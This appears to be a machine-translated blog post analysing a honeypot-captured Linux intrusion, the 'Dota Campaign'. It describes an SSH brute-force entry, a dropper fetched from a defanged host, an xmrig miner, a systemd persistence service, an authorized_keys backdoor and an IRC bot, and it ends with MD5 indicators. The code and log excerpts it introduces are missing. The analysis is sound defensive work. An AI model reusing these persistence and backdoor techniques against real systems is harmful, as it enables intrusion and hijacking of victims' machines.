Shulou(Shulou.com)05/31 Report--

Xiaobian to share with you the example analysis of Dota Campaign, I believe most people still do not know much, so share this article for your reference, I hope you have a lot of gains after reading this article, let's go to understand it together!

initial infection

Based on the contents of the attack file, I named the attack "Dota Campaign." In this attack campaign, the attacker gained initial access to the target device via weak SSH credentials. My SSH honeypot uses salvatore as both username and password. Here is the initial login data for my SSH log:

After authentication, the attacker immediately executed system commands via SSH, and all commands were passed in via actual SSH commands. Since my system is a honeypot with a custom version of OpenSSH installed, we can see the commands executed by the attacker:

First, an attacker sends an HTTP message to host 54.37.70[.] 249 requested a file named.x15cache and executed it after waiting for 10 seconds. In addition, the attacker modified the user password to a random string. The x15cache file contains the following:

From this point of view, the.x15cache file should just be a Dropper responsible for setting up the environment, which also gets host 54.37.70[.] Other documents in 249. The second file, dota2.tar.gz, contains malicious code in a directory called.rsync. I used my file detection script to extract parts of the file:

The. x15cache script switches to this.rsync directory and tries to execute./ cron and./ anacron file. The attacker used "||"Or statements to make./ cron file is executed first, if execution fails, execute./ anacron。. There is also a file in the rsync directory that never seems to run. Let's take a look at it together:

The i686 architecture is for 32-bit environments, and the x86_64 architecture is for 64-bit environments. If cron is 64 bits, anacron is 32 bits. After running, we also confirmed this:

Since both files do the same thing, we only need to analyze one of them.

Analyze cron code

Let's start by gathering some basic information with the strings command, where the "cryptonight" string caught my attention:

CryptoNight is actually a proof-of-work algorithm that works with ordinary PC CPUs, but it doesn't work with specialized mining equipment, so CryptoNight can only be mined with CPUs for the time being.

Knowing that it has something to do with mining, let's see what else the strings command can find:

Above is the help page for the xmrig command, which is a CPU mining software for Monero. In addition to this, we also captured compilation time information: May 3, 2019, which is the previous month.

Next, let's analyze network traffic. We can see the code with the new host 5.255.86[.] 129:80 Connection established:

After running tcpdump to capture traffic, we analyzed it with Wireshark:

The client sends some json data to the server, which also includes the XMrig parameter and cn parameter (CryptoNight).

Attack Phase Two

In addition to running the above command, the attacker will run another command a few seconds later:

This time, the attacker's operating directory was/dev/shm and was downloaded from the previous host 54.37.70[.] 249 Get the rp and.satan files. Next, an attacker would attempt to run sudo to gain root privileges and then infect the.satan script with root privileges. The satan file reads:

The satan script first creates a system service file called srsync and runs automatically. The srsync service calls the script/usr/local/bin/srsync.sh, and the srsync.sh script runs rsync.pl in the perl script as well as the ps.bin code file. The rsync.pl script from/dev/shm/rp is delivered from the server along with the.satan script and uses the wget command to retrieve the ps.bin code file (from host 54.37.70[.] 249）。Note that in malicious mining software, attackers use crul as a backup command for wget,

Parse ps.bin file

After a brief analysis, I discovered that ps.bin is actually a 32-bit code file:

After searching with strings, I found that the code mentioned ssh, so I searched for "ssh" with grep:

The first thing I noticed was a system command to add RSA keys to the ~/authorized_keys file, which is essentially creating an SSH backdoor because an attacker can use the associated RSA private key for account authentication. Then I also found a lot of ssh related content, which turned out to belong to the function name:

In this case, we are dealing with a pure SSH backdoor.

code analysis

First, let's look at the IP address in the backdoor code:

And the variable name is obviously Spanish, emmmm...

Next, locate the loop to the software main function:

It is mainly responsible for continuously listening to commands sent by the IRC server. The parse function is used to determine the content of the command:

I also noticed a call to a shell function:

$comando refers to the system command, which seems to be a second backdoor, and this backdoor is based on IRC channels. We can view channel connections and setup by using the netstat command:

After setting up the tcpdump command, run the perl script, and analyze the traffic through Wireshark. The complete TCP data flow is shown below:

This is standard IRC traffic, the client will continue to get the username, after success will join a ##root channel, and the server side is still created on May 7, 2019.

It is worth mentioning that there seems to be a part of DoS attack code embedded in it:

Intrusion Threat Indicator IoC-hash (MD5).satan: 36e692c1e58b53f54ae4966d15fdfa84rsync.pl: 52a422722c479d8c5483d2db9267e4cdps.bin: 04d0658afae3ea7b0fdaf6a519f2e28cdota2.tar.gz: 2cfb1ad304940ae7e3af954d5c1d1363.x15cache: 6d6fb279bb78b25413a441e4bfd3ded9cron: fdb085727694e327c8758061a224166banacron: 2c15d9bcd208c9446b14452d25d9ca84 above is "Dota Campaign Sample Analysis" All the contents of this article, thank you for reading! I believe that everyone has a certain understanding, hope to share the content to help everyone, if you still want to learn more knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.